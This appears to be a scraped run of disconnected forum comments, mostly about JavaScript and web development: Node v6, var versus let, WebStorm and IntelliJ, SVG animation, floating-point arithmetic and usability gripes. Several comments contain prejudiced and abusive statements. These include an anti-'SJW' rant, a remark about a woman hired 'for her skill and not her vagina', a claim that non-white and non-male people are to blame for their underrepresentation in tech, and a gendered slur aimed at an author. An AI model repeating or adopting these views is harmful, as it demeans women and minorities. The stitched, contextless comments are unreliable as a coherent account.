Except that, sady and counter-inituitively, SJWs rarely treat people with opinions even slightly deviatiing from their own, often radical and militant stanza on such matters, with decency, let alone respect. Because in reality, for them it's about ego and butthurt, or about self-promotion, and not about altruism or issues at hand.
It's absolutely terrible, I mean seriously who wants the scroll to chop off entire paragraphs instead of a line of content. Who wants their mouse to bloody stop scrolling because you are accidentally scrolling over the embedded content that your handler cannot handle. It's one of those things that a designer thinks would look cool but doesn't bother thinking if it is usable. 
"highly optimized" is just Your imagination. If You disagree, then please provide link and citation.
It truly was informative and unbiased 
When the hell did node v6 come out?! Wtf how did I miss that? And with 99% feature parity with ES6!
So, you're saying that var is dead? :P Only using something for legacy crap means that it's dead.
Yea, the more recent features will of course get more optimized in the future. "1. make it work, 2. make it work *correctly*, 3. make it faster" is true for virtual machines, too.
This looks like a clone of http://timeago.yarp.com OP care to comment? It is not appropriate to copy ones project in its entirety and pass it off as your own. You should give proper attribution to the original creator of the work, Ryan McGeary
Don't roll your own. Even though we work with companies like Vantiv and Braintree, we still have a three-people team dedicated only to payments. Once you handle money you enter into a complicated world of regulations and compliances. 
&gt; So, you're saying that var is dead? We have different definitions of `dead` I think. 
Looks like end of April https://nodejs.org/en/blog/release/v6.0.0/ 
visual studio has a free IDE out there called "Code" that has debug functionality.
It'd be nice to have some code examples with how you'd do some simple things.
So much this. My first IT job (not dev, just help desk) was nothing but 15 guys. A female manager was hired, and she told the floor manager he had to hire a woman. He said, "I will hire whoever is most qualified. If it's a woman, great. If it's not, too bad." When she got pissed off at him, he said, "It's not my job to educate women. It's my job to hire whoever is best at their job. If you want a woman hired, go educate one." Funny enough, he ended up hiring a woman, but I can 100% tell you we all respected her much more because we knew she got hired for her skill and not her vagina. Yes, the tech industry is mostly men. Mostly white men. That's not my fault. It's the fault of every non-white and/or non-male that they didn't learn more and isn't better at their job. As many, many, many motivational speaker will tell you: BE THE CHANGE. Don't like it? Get better. Problem solved.
I'll go ahead and say it... this guy is an utter pretentious cunt. Besides... call me when 95% of all browsers in use support this shit.
There are two undeniable facts about 90% of Americans (maybe the world, but I'm not well-travelled): 1. People fucking hate the truth 2. People always think someone else is to blame
Looks like it has a dependency on jquery?
Can you debug with Firefox or any other browsers besides Chrome?
narrative has a smidgeon of javascript fanboyism! ;) 
Nothing says website usability like "first resize your window to less than half of your screen's size."
That's because webstorm is just a plugin for the intellij platform.
&gt; Use var for top-level variables that are shared across many (especially larger) scopes. That sounds like something you should avoid, or am I wrong?
If you are considering sub-2g connections in mind then you simply wouldn't consider any frameworks like React/Backbone either, is that right? You're dealing with a connection speed that just can't load modern Javascript libraries, which seems not very typical or practical for readers of this subreddit. 
I don't really claim to know what code is shared and how jetbrains manages their releases, but I am confused by this statement since webstorm is marketed and sold as is own ide.
IntelliJ is the entire platform. Webstorm is a specific plugin for intellij that they broke out into a separate (cheaper) IDE. This is the same for RubyMine, PHPStorm, PyCharm, etc. They're all just plugins.
you could open dev tools, go to the network tab, select XHR, and look for requests.... or incase it doesnt use XHR to download the malware, you could always open up wireshark etc
Very surprised this post didn't mention SVG at all. SMIL doesn't work everywhere and was considered deprecated (I've read its back on track now?). CSS transitions can't animate SVG properties only CSS properties. There are a ton of weird issues with animating SVG that Web Animations have fixed for me. Also Web Animations can supposedly return a promise (wasn't implemented anywhere last I used them) which will be amazing with async/await to compose some really cool animations without nesting a ton of callbacks.
Are you implying that because someone is willing to buy a product that utilizes pseudoscience it means that the pseudoscience is real? Well damn, i guess those horoscopes and homeopathic herbal supplements have something going for them then.
just for completeness, you might want to get an understanding of the IEEE floating point spec, for instance, try this: .3 -.1 you might be amazed to notice the result: 0.19999999999999998 
I actually found several posts explaining (or at least discussing) this while searching for answers to my initial questions, but thanks :) Had I not stumbled upon those post then this would definitely have got me confused at some point as well.